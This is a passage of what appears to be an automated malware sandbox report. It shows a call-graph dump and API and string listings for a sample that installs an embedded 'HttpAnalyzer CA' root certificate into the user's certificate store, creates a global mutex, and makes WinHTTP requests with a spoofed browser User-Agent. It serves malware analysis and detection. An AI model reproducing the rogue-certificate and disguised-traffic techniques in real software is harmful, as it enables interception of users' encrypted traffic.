67 API calls 7847->7850 7852 40c11b 7847->7852 7849 40c0bc 7848->7849 7851 403d90 __write_nolock 67 API calls 7849->7851 7853 40c0fc 7850->7853 7854 40c0c4 7851->7854 7852->7829 7855 403d90 __write_nolock 67 API calls 7853->7855 7854->7829 7856 40c103 7855->7856 7857 402f43 __write_nolock 4 API calls 7856->7857 7858 40c113 7857->7858 7858->7829 7859->7822 7863 40c1bf LeaveCriticalSection 7860->7863 7862 4096c0 7862->7742 7863->7862 7865 401787 __aulldiv 7864->7865 7865->7611 7868 4013c0 7866->7868 7867 4013ff 7869 40140e 7867->7869 7955 402715 7867->7955 7868->7867 7872 4013e2 7868->7872 7873 401421 7869->7873 7963 401510 7869->7963 7939 4012d0 7872->7939 7877 401435 7873->7877 7977 402928 7873->7977 7875 4013f9 7875->7562 7877->7562 8066 401ff0 7878->8066 7880 4022a1 7881 4026b9 7880->7881 8085 401cc0 7880->8085 7883 4027ab __putwch_nolock 5 API calls 7881->7883 7885 4026e1 7883->7885 7884 4022bc 7886 401cc0 69 API calls 7884->7886 7885->7566 7887 4022cf 7886->7887 8091 403118 7887->8091 7890 402338 WinHttpSetOption WinHttpConnect 7892 402678 WinHttpCloseHandle 7890->7892 7893 40236f WinHttpOpenRequest 7890->7893 7891 40267f 7894 402b57 __freebuf 67 API calls 7891->7894 7892->7891 7897 4023b0 WinHttpQueryOption WinHttpSetOption WinHttpAddRequestHeaders 7893->7897 7898 402669 WinHttpCloseHandle 7893->7898 7896 402689 7894->7896 7899 402b57 __freebuf 67 API calls 7896->7899 7900 402416 WinHttpSetTimeouts WinHttpSendRequest 7897->7900 7901 4023f8 7897->7901 7898->7892 7902 402692 7899->7902 7905 40244c WinHttpReceiveResponse 7900->7905 7906 40265e WinHttpCloseHandle 7900->7906 7901->7900 7903 402400 WinHttpAddRequestHeaders 7901->7903 7904 402b57 __freebuf 67 API calls 7902->7904 7903->7900 7903->7903 7908 40269f 7904->7908 7905->7906 7907 402461 WinHttpQueryHeaders GetLastError 7905->7907 7906->7898 7909 40248e 7907->7909 7931 402513 _memset ctype 7907->7931 7910 402b57 __freebuf 67 API calls 7908->7910 7912 402c34 _malloc 67 API calls 7909->7912 7911 4026ac 7910->7911 7913 402b57 __freebuf 67 API calls 7911->7913 7914 40249b _memset 7912->7914 7913->7881 7917 4024b0 WinHttpQueryHeaders 7914->7917 7915 402530 WinHttpQueryDataAvailable 7916 402633 GetLastError 7915->7916 7915->7931 7918 402f67 _printf 105 API calls 7916->7918 8100 401c40 7917->8100 7938 402631 7918->7938 7920 402c34 _malloc 67 API calls 7920->7931 7921 4024cc 7922 401260 std::_String_base::_Xlen 75 API calls 7921->7922 7925 4024db 7922->7925 7923 402649 7924 402f67 _printf 105 API calls 7923->7924 7924->7938 8106 401ef0 7925->8106 7927 40257e WinHttpReadData 7929 402597 GetLastError 7927->7929 7927->7931 7928 4024f0 7932 402b57 __freebuf 67 API calls 7928->7932 8116 402f67 7929->8116 7931->7915 7931->7920 7931->7923 7931->7927 7933 4013b0 std::_String_base::_Xlen 75 API calls 7931->7933 7936 401ef0 75 API calls 7931->7936 7937 402b57 __freebuf 67 API calls 7931->7937 7931->7938 7934 40250a 7932->7934 7933->7931 7935 402b57 __freebuf 67 API calls 7934->7935 7935->7931 7936->7931 7937->7931 7938->7906 7940 4012e3 7939->7940 7941 4012e8 7939->7941 7986 402754 7940->7986 7943 40131a 7941->7943 7944 4012fb 7941->7944 7945 401324 7943->7945 7947 402715 std::_String_base::_Xlen 75 API calls 7943->7947 7996 401480 7944->7996 7949 401510 std::_String_base::_Xlen 75 API calls 7945->7949 7952 401337 7945->7952 7947->7945 7949->7952 7950 401480 std::_String_base::_Xlen 75 API calls 7951 401311 7950->7951 7951->7875 7953 402928 _memcpy_s 67 API calls 7952->7953 7954 40134a 7952->7954 7953->7954 7954->7875 7956 402721 __EH_prolog3 7955->7956 7957 401260 std::_String_base::_Xlen 75 API calls 7956->7957 7958 40272e 7957->7958 7959 401ab0 std::_String_base::_Xlen 75 API calls 7958->7959 7960 40273e 7959->7960 7961 40346b __CxxThrowException@8 RaiseException 7960->7961 7962 402753 7961->7962 7964 40154d 7963->7964 7965 40157f 7964->7965 7966 40159b 7964->7966 8036 402a72 7965->8036 8048 402826 7966->8048 7970 40346b __CxxThrowException@8 RaiseException 7971 4015bf 7970->7971 8054 401690 7971->8054 7972 40160b ctype 7972->7873 7975 4015d8 7975->7873 7976 402928 _memcpy_s 67 API calls 7976->7972 7980 40293a _memset 7977->7980 7983 402936 ___crtGetEnvironmentStringsA 7977->7983 7978 40293f 7979 403d90 __write_nolock 67 API calls 7978->7979 7985 402944 7979->7985 7980->7978 7981 402989 7980->7981 7980->7983 7981->7983 7984 403d90 __write_nolock 67 API calls 7981->7984 7982 402f43 __write_nolock 4 API calls 7982->7983 7983->7877 7984->7985 7985->7982 7987 402760 __EH_prolog3 7986->7987 8002 401260 7987->8002 7993 402792 8013 401bc0 7993->8013 7997 40148e 7996->7997 7999 401493 7996->7999 7998 402754 std::_String_base::_Xlen 75 API calls 7997->7998 7998->7999 8001 401307 7999->8001 8024 4027ba 7999->8024 8001->7950 8003 401280 8002->8003 8003->8003 8004 4013b0 std::_String_base::_Xlen 75 API calls 8003->8004 8005 401294 8004->8005 8006 401ab0 8005->8006 8007 401add std::_String_base::_Xlen 8006->8007 8008 4012d0 std::_String_base::_Xlen 75 API calls 8007->8008 8009 401b06 8008->8009 8010 40346b 8009->8010 8011 403492 8010->8011 8012 40349e RaiseException 8010->8012 8011->8012 8012->7993 8018 40288c 8013->8018 8016 4012d0 std::_String_base::_Xlen 75 API calls 8017 401c1b 8016->8017 8017->7941 8019 401bf3 8018->8019 8020 4028a8 _strlen 8018->8020 8019->8016 8020->8019 8021 402c34 _malloc 67 API calls 8020->8021 8022 4028bb 8021->8022 8022->8019 8023 40302c _strcpy_s 67 API calls 8022->8023 8023->8019 8025 4027c8 8024->8025 8026 4027e1 8024->8026 8027 4027cd 8025->8027 8028 4027ed 8025->8028 8026->8001 8029 403d90 __write_nolock 67 API calls 8027->8029 8030 402800 8028->8030 8031 4027f2 8028->8031 8032 4027d2 8029->8032 8034 4039f0 ___sbh_free_block __VEC_memcpy 8030->8034 8033 403d90 __write_nolock 67 API calls 8031->8033 8035 402f43 __write_nolock 4 API calls 8032->8035 8033->8032 8034->8026 8035->8026 8039 402a7a 8036->8039 8037 402c34 _malloc 67 API calls 8037->8039 8038 401587 8038->7972 8038->7976 8039->8037 8039->8038 8040 4043fc __calloc_impl 4 API calls 8039->8040 8041 402a96 std::_String_base::_Xlen 8039->8041 8040->8039 8042 402abc 8041->8042 8045 4043e0 __cinit 74 API calls 8041->8045 8043 40288c std::exception::exception 67 API calls 8042->8043 8044 402ac6 8043->8044 8046 40346b __CxxThrowException@8 RaiseException 8044->8046 8045->8042 8047 402adb 8046->8047 8049 40283b _strlen 8048->8049 8053 4015aa 8048->8053 8050 402c34 _malloc 67 API calls 8049->8050 8051 40284a 8050->8051 8052 40302c _strcpy_s 67 API calls 8051->8052 8051->8053 8052->8053 8053->7970 8055 4016ac 8054->8055 8057 40169b 8054->8057 8056 4016b8 8055->8056 8055->8057 8058 402826 std::exception::exception 67 API calls 8056->8058 8059 402a72 std::_String_base::_Xlen 75 API calls 8057->8059 8061 4016ce 8058->8061 8060 4016a3 8059->8060 8060->7975 8062 40346b __CxxThrowException@8 RaiseException 8061->8062 8063 4016e5 8062->8063 8064 40288c std::exception::exception 67 API calls 8063->8064 8065 4016fd 8064->8065 8065->7975 8067 402037 8066->8067 8068 4021fd 8067->8068 8071 402058 8067->8071 8069 4027ab __putwch_nolock 5 API calls 8068->8069 8070 40220d 8069->8070 8070->7880 8072 402c34 _malloc 67 API calls 8071->8072 8073 4020ca _memset ___crtGetEnvironmentStringsA 8072->8073 8074 402137 8073->8074 8075 4020f8 8073->8075 8076 402c34 _malloc 67 API calls 8074->8076 8077 402c34 _malloc 67 API calls 8075->8077 8078 402117 _memset ___crtGetEnvironmentStringsA 8076->8078 8077->8078 8079 4021a1 8078->8079 8133 4030f9 8078->8133 8080 402c34 _malloc 67 API calls 8079->8080 8082 4021c4 _memset ___crtGetEnvironmentStringsA 8080->8082 8083 4027ab __putwch_nolock 5 API calls 8082->8083 8084 4021f9 8083->8084 8084->7880 8086 401cd0 8085->8086 8086->8086 8087 401cd9 MultiByteToWideChar 8086->8087 8088 402c34 _malloc 67 API calls 8087->8088 8089 401cf9 _memset 8088->8089 8090 401d04 MultiByteToWideChar 8089->8090 8090->7884 8092 40312d 8091->8092 8093 403125 8091->8093 8094 403d90 __write_nolock 67 API calls 8092->8094 8093->8092 8098 403155 8093->8098 8095 403132 8094->8095 8096 402f43 __write_nolock 4 API calls 8095->8096 8097 402318 WinHttpOpen 8096->8097 8097->7890 8097->7891 8098->8097 8099 403d90 __write_nolock 67 API calls 8098->8099 8099->8095 8101 401c50 8100->8101 8101->8101 8102 401c5b WideCharToMultiByte 8101->8102 8103 402c34 _malloc 67 API calls 8102->8103 8104 401c85 _memset 8103->8104 8105 401c90 WideCharToMultiByte 8104->8105 8105->7921 8107 401f01 8106->8107 8108 401f1b 8107->8108 8109 402715 std::_String_base::_Xlen 75 API calls 8107->8109 8110 401f33 8108->8110 8111 402715 std::_String_base::_Xlen 75 API calls 8108->8111 8113 401f5d 8108->8113 8109->8108 8112 401510 std::_String_base::_Xlen 75 API calls 8110->8112 8114 401f46 8110->8114 8111->8110 8112->8114 8113->7928 8114->8113 8115 402928 _memcpy_s 67 API calls 8114->8115 8115->8113 8117 402f73 __ioinit 8116->8117 8118 402f81 8117->8118 8119 402f9e __stbuf 8117->8119 8120 403d90 __write_nolock 67 API calls 8118->8120 8142 406b7f 8119->8142 8121 402f86 8120->8121 8123 402f43 __write_nolock 4 API calls 8121->8123 8125 402f96 __ioinit 8123->8125 8124 402fb0 __stbuf 8147 406bf4 8124->8147 8125->7931 8127 402fc2 __stbuf 8128 4046a1 __output_l 103 API calls 8127->8128 8129 402fda __stbuf 8128->8129 8154 406c8a 8129->8154 8136 403091 8133->8136 8137 40309e _strlen 8136->8137 8138 403d90 __write_nolock 67 API calls 8137->8138 8139 4030ba 8137->8139 8140 4030aa 8138->8140 8139->8079 8141 402f43 __write_nolock 4 API calls 8140->8141 8141->8139 8143 406b93 EnterCriticalSection 8142->8143 8144 406b88 8142->8144 8143->8124 8145 405264 __lock 67 API calls 8144->8145 8146 406b91 8145->8146 8146->8124 8148 409e06 __output_l 67 API calls 8147->8148 8149 406bff 8148->8149 8150 409da8 __write_nolock 67 API calls 8149->8150 8151 406c05 __stbuf 8150->8151 8152 409360 __malloc_crt 67 API calls 8151->8152 8153 406c51 8151->8153 8152->8153 8153->8127 8155 406c91 8154->8155 8157 402feb 8154->8157 8155->8157 8162 40b2b2 8155->8162 8158 403003 8157->8158 8159 403008 __stbuf 8158->8159 8168 406bd1 8159->8168 8161 403013 8161->8125 8163 40b2c7 8162->8163 8164 40b2e8 8162->8164 8163->8164 8165 409e06 __output_l 67 API calls 8163->8165 8164->8157 8166 40b2e1 8165->8166 8167 409c88 __locking 101 API calls 8166->8167 8167->8164 8169 406be5 LeaveCriticalSection 8168->8169 8170 406bda 8168->8170 8169->8161 8173 40518c LeaveCriticalSection 8170->8173 8172 406be3 8172->8161 8173->8172 8175 406140 __ioinit 8174->8175 8176 405264 __lock 67 API calls 8175->8176 8177 406147 8176->8177 8178 40616b 8177->8178 8181 4061b2 _doexit 8177->8181 8180 4065b2 __decode_pointer 4 API calls 8178->8180 8182 406176 8180->8182 8190 4061ed 8181->8190 8185 4065b2 __decode_pointer 4 API calls 8182->8185 8184 4061ea __ioinit 8184->6607 8189 406183 _doexit 8185->8189 8187 4061e1 8188 405fd0 _fast_error_exit 3 API calls 8187->8188 8188->8184 8189->8181 8191 4061f3 8190->8191 8192 4061ce 8190->8192 8195 40518c LeaveCriticalSection 8191->8195 8192->8184 8194 40518c LeaveCriticalSection 8192->8194 8194->8187 8195->8192 8197 406652 8196->8197 8198 40665e 8196->8198 8201 4065b2 __decode_pointer 4 API calls 8197->8201 8199 406680 8198->8199 8200 406672 TlsFree 8198->8200 8199->8199 8200->8199 8201->8198 8213 4065a9 8202->8213 8204 406248 __init_pointers 8216 40909d 8204->8216 8207 406546 __encode_pointer 4 API calls 8208 406284 8207->8208 8208->6628 8210 4050f7 8209->8210 8211 40aa5f ___crtInitCritSecAndSpinCount 67 API calls 8210->8211 8212 405125 8210->8212 8211->8210 8212->6638 8212->6639 8214 406546 __encode_pointer 4 API calls 8213->8214 8215 4065b0 8214->8215 8215->8204 8217 406546 __encode_pointer 4 API calls 8216->8217 8218 40627a 8217->8218 8218->8207 8221 407c5a 8219->8221 8220 40b995 __wincmdln 77 API calls 8220->8221 8221->8220 8223 407cc7 8221->8223 8222 407dc5 8222->6663 8222->6664 8223->8222 8224 40b995 77 API calls __wincmdln 8223->8224 8224->8223

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 00401870 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 177encryptionCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(-----BEGIN CERTIFICATE-----MIIC/DCCAeSgAwIBAgIRAM7/2B7/QDUVyz9XivEGNvAwDQYJKoZIhvcNAQEFBQAwJzELMAkGA1UEBhMCRU4xGDAWBgNVBAMTD0h0dHBBbmFseXplciBDQTAeFw0xNDA1MjAwMjUzMThaFw0zNDA1MTUwMjUzMThaMCcxCzAJBgNVBAYTAkVOMRgwFgYDVQQDEw9IdHRwQW5hbHl6ZXIgQ0EwggEiMA0GCSqGS,00000000,00000000,00000000,?,00000000,00000000), ref: 004018A7
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 004018BE
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: __FF_MSGBANNER.LIBCMT ref: 00402C57
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: __NMSG_WRITE.LIBCMT ref: 00402C5E
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: HeapAlloc.KERNEL32(00000000,?,74E96E60,?,?,00000000,004018C3,?), ref: 00402CAC
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(-----BEGIN CERTIFICATE-----MIIC/DCCAeSgAwIBAgIRAM7/2B7/QDUVyz9XivEGNvAwDQYJKoZIhvcNAQEFBQAwJzELMAkGA1UEBhMCRU4xGDAWBgNVBAMTD0h0dHBBbmFseXplciBDQTAeFw0xNDA1MjAwMjUzMThaFw0zNDA1MTUwMjUzMThaMCcxCzAJBgNVBAYTAkVOMRgwFgYDVQQDEw9IdHRwQW5hbHl6ZXIgQ0EwggEiMA0GCSqGS,00000000,00000000,00000000,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                              • CertCreateCertificateContext.CRYPT32(00000001,00000000,?), ref: 004018E9
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: __lock.LIBCMT ref: 00402B75
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: ___sbh_find_block.LIBCMT ref: 00402B80
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: ___sbh_free_block.LIBCMT ref: 00402B8F
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: HeapFree.KERNEL32(00000000,?,0044A918,0000000C,00405245,00000000,0044A9E0,0000000C,0040527D,?,?,?,0040BD2E,00000004,0044AD90,0000000C), ref: 00402BBF
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: GetLastError.KERNEL32(?,00403D95,00402CED,00000000,004018C3,?), ref: 00402BD0
                                                                                                                                                                                                                                                              • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00014000,0044A3E8), ref: 00401910
                                                                                                                                                                                                                                                              • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 0040192A
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401938
                                                                                                                                                                                                                                                              • CertGetCertificateContextProperty.CRYPT32 ref: 00401961
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00401973
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401990
                                                                                                                                                                                                                                                              • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,?), ref: 004019A1
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004019BA
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004019D9
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004019F2
                                                                                                                                                                                                                                                              • _sprintf.LIBCMT ref: 00401A1B
                                                                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,?,00000000,00000103,?,00000000,00000103,?,00000000,00000103), ref: 00401A3E
                                                                                                                                                                                                                                                              • _sprintf.LIBCMT ref: 00401A5E
                                                                                                                                                                                                                                                              • CertCloseStore.CRYPT32(00000000,00000001), ref: 00401A7F
                                                                                                                                                                                                                                                              • CertFreeCertificateContext.CRYPT32(00000000), ref: 00401A86
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • %s\Microsoft\SystemCertificates\My\Certificates\%s, xrefs: 00401A58
                                                                                                                                                                                                                                                              • -----BEGIN CERTIFICATE-----MIIC/DCCAeSgAwIBAgIRAM7/2B7/QDUVyz9XivEGNvAwDQYJKoZIhvcNAQEFBQAwJzELMAkGA1UEBhMCRU4xGDAWBgNVBAMTD0h0dHBBbmFseXplciBDQTAeFw0xNDA1MjAwMjUzMThaFw0zNDA1MTUwMjUzMThaMCcxCzAJBgNVBAYTAkVOMRgwFgYDVQQDEw9IdHRwQW5hbHl6ZXIgQ0EwggEiMA0GCSqGS, xrefs: 0040189A, 004018DA
                                                                                                                                                                                                                                                              • %02X, xrefs: 00401A15
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Cert$CertificateContext$_memset$Store$BinaryCryptErrorFreeHeapLastPropertyString_malloc_sprintf$AllocCloseCreateFolderOpenPathSpecial___sbh_find_block___sbh_free_block__lock
                                                                                                                                                                                                                                                              • String ID: %02X$%s\Microsoft\SystemCertificates\My\Certificates\%s$-----BEGIN CERTIFICATE-----MIIC/DCCAeSgAwIBAgIRAM7/2B7/QDUVyz9XivEGNvAwDQYJKoZIhvcNAQEFBQAwJzELMAkGA1UEBhMCRU4xGDAWBgNVBAMTD0h0dHBBbmFseXplciBDQTAeFw0xNDA1MjAwMjUzMThaFw0zNDA1MTUwMjUzMThaMCcxCzAJBgNVBAYTAkVOMRgwFgYDVQQDEw9IdHRwQW5hbHl6ZXIgQ0EwggEiMA0GCSqGS
                                                                                                                                                                                                                                                              • API String ID: 3463177663-234524284
                                                                                                                                                                                                                                                              • Opcode ID: 2629ce6460a876b2837b9365e1982b550fa9b1502f47bf0f5508d79af2f3a13e
                                                                                                                                                                                                                                                              • Instruction ID: 6f6a5e1feda1b130aac6b651d9f558dbab91ffb13dc69dfec88f4b3be10ee0dd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2629ce6460a876b2837b9365e1982b550fa9b1502f47bf0f5508d79af2f3a13e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51510A716443057BE220EF51DC46F9BBBDCEF84744F00082EF549B61D1E6B9AA44CA6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401D20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 172 401d20-401d6d InitializeSecurityDescriptor SetSecurityDescriptorDacl CreateMutexA 173 401d81 172->173 174 401d6f-401d7f GetLastError 172->174 175 401d83-401d87 173->175 174->173 174->175
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?,?,?,0040117F), ref: 00401D2D
                                                                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0040117F), ref: 00401D3C
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE ref: 00401D65
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D6F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • Global\signature_netsetup, xrefs: 00401D42
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                                                                                                                              • String ID: Global\signature_netsetup
                                                                                                                                                                                                                                                              • API String ID: 4085719312-2187932148
                                                                                                                                                                                                                                                              • Opcode ID: 7c7a7a33da801d930861935cd136b829672ec26b7c289fe7f2e15a92e6601712
                                                                                                                                                                                                                                                              • Instruction ID: 0f99239409da629afb65f52e1844852861ea3dc71b8d285e289e10e62427dabb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c7a7a33da801d930861935cd136b829672ec26b7c289fe7f2e15a92e6601712
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F06771104321ABE314DF91DD88BCB7BA8EF84704F004828F648E2290D3B9D58CCBEA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402220 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 353timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 0 402220-4022a8 call 401ff0 3 4026c0-4026e7 call 4027ab 0->3 4 4022ae-402332 call 401cc0 * 2 call 403118 WinHttpOpen 0->4 13 402338-402369 WinHttpSetOption WinHttpConnect 4->13 14 40267f-4026bd call 402b57 * 5 4->14 15 402678-402679 WinHttpCloseHandle 13->15 16 40236f-40237d 13->16 14->3 15->14 18 402388-4023aa WinHttpOpenRequest 16->18 19 40237f-402384 16->19 21 4023b0-4023f6 WinHttpQueryOption WinHttpSetOption WinHttpAddRequestHeaders 18->21 22 402669-402674 WinHttpCloseHandle 18->22 19->18 24 402416-402446 WinHttpSetTimeouts WinHttpSendRequest 21->24 25 4023f8-4023fe 21->25 22->15 29 40244c-40245b WinHttpReceiveResponse 24->29 30 40265e-402665 WinHttpCloseHandle 24->30 25->24 27 402400-402414 WinHttpAddRequestHeaders 25->27 27->24 27->27 29->30 31 402461-402488 WinHttpQueryHeaders GetLastError 29->31 30->22 33 402516-402523 31->33 34 40248e-402513 call 402c34 call 403de0 WinHttpQueryHeaders call 401c40 call 401260 call 401ef0 call 4012a0 call 402b57 * 2 31->34 38 402656-40265a 33->38 39 402529-40252e 33->39 34->33 38->30 42 402530-402546 WinHttpQueryDataAvailable 39->42 45 402633-402647 GetLastError call 402f67 42->45 46 40254c-402552 42->46 45->38 46->38 48 402558-402568 call 402c34 46->48 56 402649-402653 call 402f67 48->56 57 40256e-402595 call 403de0 WinHttpReadData 48->57 56->38 65 402597-4025a8 GetLastError call 402f67 57->65 66 4025ab-4025b0 57->66 65->66 66->38 67 4025b6-4025cd 66->67 70 4025d0-4025d7 67->70 70->70 73 4025d9-40260e call 4013b0 call 401ef0 70->73 82 402610-40261a call 402923 73->82 83 40261d-40262b call 402b57 73->83 82->83 83->42 88 402631 83->88 88->38
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00401FF0: _malloc.LIBCMT ref: 004020C5
                                                                                                                                                                                                                                                                • Part of subcall function 00401FF0: _memset.LIBCMT ref: 004020D1
                                                                                                                                                                                                                                                                • Part of subcall function 00401FF0: _malloc.LIBCMT ref: 00402112
                                                                                                                                                                                                                                                                • Part of subcall function 00401FF0: _memset.LIBCMT ref: 0040211D
                                                                                                                                                                                                                                                                • Part of subcall function 00401CC0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000000,?,00000000,004022BC,?,?,00000000), ref: 00401CE7
                                                                                                                                                                                                                                                                • Part of subcall function 00401CC0: _malloc.LIBCMT ref: 00401CF4
                                                                                                                                                                                                                                                                • Part of subcall function 00401CC0: _memset.LIBCMT ref: 00401CFF
                                                                                                                                                                                                                                                                • Part of subcall function 00401CC0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,004022BC,?,?,00000000), ref: 00401D13
                                                                                                                                                                                                                                                              • _wcscpy_s.LIBCMT ref: 00402313
                                                                                                                                                                                                                                                              • WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00402324
                                                                                                                                                                                                                                                              • WinHttpSetOption.WINHTTP ref: 00402350
                                                                                                                                                                                                                                                              • WinHttpConnect.WINHTTP(00000000,00000000,?,00000000), ref: 0040235B
                                                                                                                                                                                                                                                              • WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 004023A0
                                                                                                                                                                                                                                                              • WinHttpQueryOption.WINHTTP(00000000,0000001F,?,?), ref: 004023C5
                                                                                                                                                                                                                                                              • WinHttpSetOption.WINHTTP(00000000,0000001F,?,00000004), ref: 004023DD
                                                                                                                                                                                                                                                              • WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,000000FF,A0000000), ref: 004023F2
                                                                                                                                                                                                                                                              • WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 00402409
                                                                                                                                                                                                                                                              • WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 0040242B
                                                                                                                                                                                                                                                              • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040243E
                                                                                                                                                                                                                                                              • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 0040244F
                                                                                                                                                                                                                                                              • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,00000000,00000000), ref: 0040247D
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040247F
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00402496
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004024AB
                                                                                                                                                                                                                                                              • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000,?,?,?,00000004), ref: 004024C0
                                                                                                                                                                                                                                                                • Part of subcall function 00401C40: WideCharToMultiByte.KERNEL32(00000000,00000000,004024CC,004024CA,00000000,00000000,00000000,00000000,00000000,6F752AA0,00000000,6F73F270,?,004024CC,00000000), ref: 00401C75
                                                                                                                                                                                                                                                                • Part of subcall function 00401C40: _malloc.LIBCMT ref: 00401C80
                                                                                                                                                                                                                                                                • Part of subcall function 00401C40: _memset.LIBCMT ref: 00401C8B
